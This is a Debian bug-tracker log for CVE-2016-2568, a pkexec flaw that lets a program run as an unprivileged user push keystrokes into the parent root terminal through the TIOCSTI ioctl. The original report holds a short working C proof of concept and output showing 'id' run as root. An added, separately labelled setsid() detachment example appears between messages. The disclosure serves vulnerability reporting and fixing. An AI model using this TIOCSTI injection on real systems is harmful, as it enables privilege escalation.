policykit-1: CVE-2016-2568: Program run via pkexec as unprivileged user can escape to parent session via TIOCSTI ioctl

Related Vulnerabilities: CVE-2016-2568, CVE-2005-4890

Debian Bug report logs - #812512

Reported by: up201407890@alunos.dcc.fc.up.pt

Date: Sun, 24 Jan 2016 15:12:02 UTC

Severity: important

Tags: security, upstream

Merged with 816062

Found in version policykit-1/0.105-14.1


Report forwarded to debian-bugs-dist@lists.debian.org, Utopia Maintenance Team <pkg-utopia-maintainers@lists.alioth.debian.org>:
Bug#812512; Package policykit-1. (Sun, 24 Jan 2016 15:12:05 GMT)


Acknowledgement sent to up201407890@alunos.dcc.fc.up.pt:
New Bug report received and forwarded. Copy sent to Utopia Maintenance Team <pkg-utopia-maintainers@lists.alioth.debian.org>. (Sun, 24 Jan 2016 15:12:05 GMT)


Message #5 received at submit@bugs.debian.org:

From: up201407890@alunos.dcc.fc.up.pt
To: submit@bugs.debian.org
Subject: pkexec tty hijacking via TIOCSTI ioctl
Date: Sun, 24 Jan 2016 16:08:57 +0100
Package: policykit-1
Version: all
Severity: important
File: /usr/bin/pkexec

When executing a program via "pkexec --user nonpriv program" the  
nonpriv session can escape to the parent session by using the TIOCSTI  
ioctl to push characters into the terminal's input buffer, allowing  
privilege escalation.
This issue has been fixed in "su" CVE-2005-4890 by calling setsid()  
and in "sudo" by using the "use_pty" flag.

$ cat test.c
#include <sys/ioctl.h>

int main()
{
 char *cmd = "id\n";
 while(*cmd)
  ioctl(0, TIOCSTI, cmd++);
}

$ gcc test.c -o test
$ id
uid=1000(saken) gid=1000(saken) groups=1000(saken)

# pkexec --user saken ./test ----> last command I type in
id
# id ----> did not type this
uid=0(root) gid=0(root) groups=0(root)


I don't believe any of the previous mentions of fixes for "su" and  
"sudo" work here, since executing a shell via pkexec would make it not  
have job control.

I'm also requesting a CVE for this issue.

Thanks,
Federico Bento
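
The report cites setsid() as the fix applied to "su". As an added example (not code from the report, from polkit or from su), the C program below shows a launcher detaching a child from the controlling terminal and verifying the result before it would exec anything; the function names child_detached_from_tty and detach_and_verify are hypothetical.

```c
/* Added example: verify that a child started in a new session has no
 * controlling terminal. Function names are hypothetical. */
#include <fcntl.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Runs in the child. Returns 0 when the process leads a new session and
 * can no longer reach a controlling terminal through /dev/tty. */
static int detach_and_verify(void)
{
    if (setsid() == (pid_t)-1)
        return 2;                    /* caller was already a group leader */
    if (getsid(0) != getpid())
        return 3;                    /* not the leader of a new session */
    /* O_NOCTTY: never acquire a controlling terminal as a side effect. */
    int fd = open("/dev/tty", O_RDWR | O_NOCTTY);
    if (fd >= 0) {
        close(fd);
        return 1;                    /* a controlling tty is still attached */
    }
    /* open failed (ENXIO on Linux): no controlling terminal. Linux refuses
     * TIOCSTI with EPERM on a tty that is not the caller's controlling
     * terminal, unless the caller holds CAP_SYS_ADMIN. */
    return 0;
}

/* Fork, detach the child, and report what it found. A real launcher would
 * drop privileges and exec the target only after this check passed.
 * Returns 0 if detached, a positive code if not, -1 on fork/wait error. */
int child_detached_from_tty(void)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0)
        _exit(detach_and_verify());
    int status;
    if (waitpid(pid, &status, 0) != pid || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    int rc = child_detached_from_tty();
    printf("child detached from controlling tty: %s (rc=%d)\n",
           rc == 0 ? "yes" : "no", rc);
    return rc == 0 ? 0 : 1;
}
```

Inherited descriptors 0-2 still refer to the parent's terminal after setsid(); the sudo "use_pty" option mentioned in the report instead runs the command on a separate pseudo-terminal.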





Bug reassigned from package 'policykit-1' to 'src:policykit-1'. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 05 Jun 2016 12:45:06 GMT)


No longer marked as found in versions all. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 05 Jun 2016 12:45:07 GMT)


Marked as found in versions policykit-1/0.105-14.1. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 05 Jun 2016 12:45:08 GMT)


Added tag(s) security and upstream. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 05 Jun 2016 12:45:09 GMT)


Merged 812512 816062. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 05 Jun 2016 12:45:10 GMT)


Information forwarded to debian-bugs-dist@lists.debian.org, Utopia Maintenance Team <pkg-utopia-maintainers@lists.alioth.debian.org>:
Bug#812512; Package src:policykit-1. (Tue, 07 Jun 2016 09:42:04 GMT)


Acknowledgement sent to Adam Maris <amaris@redhat.com>:
Extra info received and forwarded to list. Copy sent to Utopia Maintenance Team <pkg-utopia-maintainers@lists.alioth.debian.org>. (Tue, 07 Jun 2016 09:42:04 GMT)


Message #20 received at 812512@bugs.debian.org:

From: Adam Maris <amaris@redhat.com>
To: 812512@bugs.debian.org
Subject: pkexec tty hijacking via TIOCSTI ioctl - CVE-2016-2568
Date: Tue, 7 Jun 2016 11:39:18 +0200
CVE (CVE-2016-2568) for this issue was already assigned here:

http://seclists.org/oss-sec/2016/q1/443

Regards,

-- 
Adam Mariš, Red Hat Product Security
1CCD 3446 0529 81E3 86AF  2D4C 4869 76E7 BEF0 6BC2

Changed Bug title to 'policykit-1: CVE-2016-2568: Program run via pkexec as unprivileged user can escape to parent session via TIOCSTI ioctl' from 'pkexec tty hijacking via TIOCSTI ioctl'. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Wed, 08 Jun 2016 14:09:08 GMT)



Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 18:08:01 2019; Machine Name: beach
